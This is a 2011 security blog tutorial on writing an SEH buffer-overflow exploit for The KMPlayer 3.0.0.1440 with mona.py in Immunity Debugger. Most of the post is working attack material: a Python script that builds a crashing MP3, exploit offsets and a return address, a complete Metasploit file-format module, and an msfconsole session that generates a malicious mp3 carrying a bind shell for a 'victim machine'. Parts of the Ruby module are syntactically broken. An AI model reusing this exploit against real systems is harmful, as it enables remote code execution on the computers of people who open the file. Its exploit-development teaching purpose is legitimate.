Secure Belief: June 2011

Mona.py is plug-in for Immunity Debugger which is developed by Corelan Team. It is a successor of pvefindaddr which is retired after the release of mona.py.

You can get more information about mona.py here & installation & usage.

While testing buffer overflow exploits for “The KMPlayer 3.0.0.1440” (exploits here & here), I noticed that it is vulnerable to SEH exploitation as well.

Here is how I crafted a metasploit module using !mona in only 3 steps.

1. Identify SEH Overflow

According to exploits reported at www.exploit-db.com, KMPlayer is vulnerable to buffer overflow when supplied specially crafted MP3 file.

Let's create a MP3 file.

#!C:/Python27/python.exe

import os;

header = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"

junk = "\x41"*5000

out_file = "kmp_crash.mp3"

exploit = header + junk

crashy = open(out_file,"w")

crashy.write(exploit)

crashy.close()

The above code will create a MP3 file with name “kmp_crash.mp3” and the content will be header and 5000 “A”s.

Run KMPlayer, attach it to Immunity Debugger and open malicious mp3 file in KMPlayer.

The KMPlayer crashes with EIP overwritten with 41414141. This is already exploited in mentioned exploits. Let’s check the SEH chain. Go to "View" and select "SEH".

SEH handlers also get overwritten with 41414141 which is user specified input. An attacker can execute malicious code by pointing this SEH handler to his/her choice of address where malicious code (shellcode) is placed in memory.

2. Fun with !mona

As we have identified the SEH overflow, let’s use mona.py to craft an exploit for this.

Run KMPlayer, attach it to Immunity Debugger. Immunity Debugger will be paused and use this time to run pycommands using mona.py. The output of commands can be seen in “Log” window.

Specify working folder with !mona config –set workingfolder C:\logs\%p and verify the same with !mona config –get workingfolder

With this, all the files created by !mona commands will be stored in this directory.

Now create a pattern of 5000 characters which will be used to replace 5000 “A”s in our mp3 file. This is a cyclic pattern of characters which will help to identify the offsets to overwrite EIP,SEH, or any other registers. This is very helpful while developing an exploit.

Run !mona pc 5000 command in Immunity Debbuger.

This will create a file named “pattern.txt”.

Copy the pattern, replace junk content with this and regenerate the mp3 file.

Now run the KMPlayer from Immunity Debbuger as it is still ‘paused’ and open newly created mp3 file in KMPlayer.

The KMPlayer is crashed as expected. Now run !mona suggest command.

This command will analyze the cyclic pattern to calculate offsets to various registers and SEH handlers and gives the payload to include this in metasploit module. This will create a file ‘exploit.rb’ which has all the mentioned details.

Mona has given exploits payload for Direct RET and SEH overflows. Now let’s craft a metasploit module to exploit SEH.

3. Crafting metasploit module

Output of !mona suggest has following output for SEH exploit:

Metasploit 'include' section :

-----------------------------

#Don't forget to include the SEH mixin !

include Msf::Exploit::Seh

Metasploit 'Targets' section :

------------------------------

'Targets' =>

[

[ '<fill in the OS/app version here>',

{

'Ret' => 0x1101dd36,

'Offset' => 3314

}

], # pop esi # pop ebx # ret 10 - bass.dll

Metasploit 'exploit' section :

-----------------------------

def exploit

buffer = rand_text(target['Offset']) #junk

buffer << generate_seh_record(target.ret)

buffer << make_nops(30)

buffer << payload.encoded #1652 bytes of space

end

Based on above suggession, I have crafted following metasploit module for KMPlayer SEH exploiations.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::FILEFORMAT

include Msf::Exploit::Seh

def initialize(info = {})

super(update_info(info,

'Name' => 'The KMPlayer 3.0.0.1440 .mp3 SEH exploit module',

'Description' => %q{

This module exploits a stack buffer overflow in The KMPlayer 3.0.0.1440.When opening a specially crafted MP3 file (.mp3) in the application, SEH handler will be overwrite.

'Author' =>

[

'AMol Naik'

'Version' => 'Version 1.0',

'References' =>

[

["URL", "http://www.exploit-db.com/exploits/17383"],

["URL", "http://www.exploit-db.com/exploits/17364"],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload' =>

{

'Space' => 5000, #could be more, but this is enough

'DisableNops' => 'True',

'BadChars' => "\x00\x0a\x0d",

'Platform' => 'win',

'Targets' =>

[

'Windows XP SP3 English VMware',

{

'Offset' => 3314,

'Ret' => 0x1101dd36, # pop esi # pop ebx # ret 10 - bass.dll

}

'Privileged' => false,

'DefaultTarget' => 0))

register_options(

[

OptString.new('FILENAME', [ true, 'mp3 file', 'msf.mp3']),

], self.class)

end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

buffer = rand_text(target['Offset']) #junk

buffer << generate_seh_record(target.ret)

buffer << make_nops(30)

buffer << payload.encoded #1652 bytes of space

filecontent = header + buffer

print_status("Writing payload to file")

file_create(filecontent)

end

Copy this file in ‘exploits’ section in metasploit to include it in metasploit framework. On Backtrack5, the path is /pentest/exploits/framework3/modules/exploits/windows/fileformat/

Start the metasploit using msfconsole command, use this exploit, set payload as windows/shell_bind_tcp and run exploit command. This will create the malicious mp3 file which will exploit SEH overflow and will listen on a port specified in payload once it opened in KMPlayer.

root@bt:~# msfconsole

_ _ _ _

| | | | (_) |

_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_

| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|

| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|

| |

|_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]

+ -- --=[ 708 exploits - 359 auxiliary - 57 post

+ -- --=[ 224 payloads - 27 encoders - 8 nops

=[ svn r13044 updated today (2011.06.28)

msf > use exploit/windows/fileformat/km_player_mp3_seh

msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME msf.mp3 yes mp3 file

Exploit target:

Id Name

-- ----

0 Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > set PAYLOAD windows/shell_bind_tcp

PAYLOAD => windows/shell_bind_tcp

msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME msf.mp3 yes mp3 file

Payload options (windows/shell_bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LPORT 4444 yes The listen port

RHOST no The target address

Exploit target:

Id Name

-- ----

0 Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > exploit

[*] Creating 'msf.mp3' file ...

[*] Writing payload to file

[*] Generated output file /root/.msf3/data/exploits/msf.mp3

msf exploit(km_player_mp3_seh) >

The file named ‘msf.mp3’ is created at /root/.msf3/data/exploits/msf.mp3. Copy this file on victim machine, open it in KMPlayer. The application didn’t crash but the SEH has been exploited and the victim machine will listen on port 4444 on which when connected will spawn a shell.

Connect to the victim machine on port 4444 & Game Over!!!

Secure Belief

Thursday, 30 June 2011

Exploit Development with mona.py